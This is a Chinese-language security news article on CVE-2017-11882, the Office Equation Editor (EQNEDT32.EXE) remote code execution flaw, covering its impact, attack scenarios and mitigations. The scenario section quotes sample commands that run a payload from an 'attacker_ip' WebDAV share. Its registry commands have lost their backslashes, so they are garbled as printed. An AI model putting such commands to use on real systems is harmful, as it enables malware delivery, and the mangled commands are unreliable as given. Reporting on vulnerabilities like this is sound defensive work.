當人們仍在著急處理“沒有補丁”的微軟MS Office內置DDE功能威脅時，有研究人員又發現了Office的另一個嚴重漏洞，攻擊者可以利用該漏洞，無需受害者用戶交互，遠程向目標系統植入惡意軟件。該漏洞屬于內存破壞型漏洞，可影響微軟過去17年發布的所有MS Office版本軟件，包括最新的Office 365，漏洞利用能成功在包括Windows 10在內的所有微軟Windows操作系統中實現。

漏洞信息

該漏洞由Embedi公司研究員發現，漏洞可導致遠程代碼執行、未授權認證繞過、無需用戶交互的遠程惡意程序植入。目前漏洞編號CVE-2017-11882，主要漏洞部件為Office中的自帶公式編輯器EQNEDT32.EXE。

由于不正確的內存操作，組件EQNEDT32.EXE會無法正確處理內存中的執行對象，這種破壞條件，致使攻擊者可在當前系統登錄用戶環境下，利用Office遠程植入惡意代碼或其它惡意程序。

微軟在Microsoft Office 2000中就引入了EQNEDT32.EXE組件，并保留至Microsoft Office 2007之后發布的所有Office 版本中，以確保新舊軟件的文檔兼容。

該漏洞的成功利用需要受害者用Office打開攻擊者特制的惡意文檔，如果與微軟的內核提權漏洞（如CVE-2017-11847）組合利用，攻擊者將會獲得受害者目標系統的完全控制權。以下視頻是在Windows 7,8,10系統中該漏洞的成功實現過程演示：

、

漏洞技術分析

詳情查看Embedi分析報告《微軟的難言之隱-你所不知道的漏洞》

可能的攻擊場景

Embedi研究者列舉了以下幾種該漏洞的可攻擊利用場景：

當插入一些OLE（對象鏈接嵌入）實體時，可能會觸發該漏洞，實現一些惡意命令的執行，如向某個攻擊者架設網站下載執行惡意程序等。

最直接有效的漏洞利用方式就是，訪問攻擊者架設或控制的WebDAV服務器，并執行其中的運行程序。

不過，攻擊者還能利用該漏洞執行cmd.exe /c start \attacker_ip f類似惡意命令，配合入侵或啟動WebClient服務。

另外，攻擊者還能使用諸如\attacker_ip f
.exe的命令向受害者系統中執行惡意程序，惡意程序的啟動機制與\live.sysinternals.com ools service方式類似。

緩解和修復措施

在11月的補丁修復周期中，微軟針對該漏洞修改了EQNEDT32.EXE組件的內存處理機制，并發布了多個漏洞補丁更新，強烈建議用戶及時進行下載更新。

鑒于EQNEDT32.EXE組件的不確定隱患，我們建議用戶通過以下注冊表命令來對其進行禁用：

reg add “HKLMSOFTWAREMicrosoftOfficeCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0400

如果在64位操作系統中安裝了32位的MS Office軟件，命令如下：

reg add “HKLMSOFTWAREWow6432NodeMicrosoftOfficeCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0400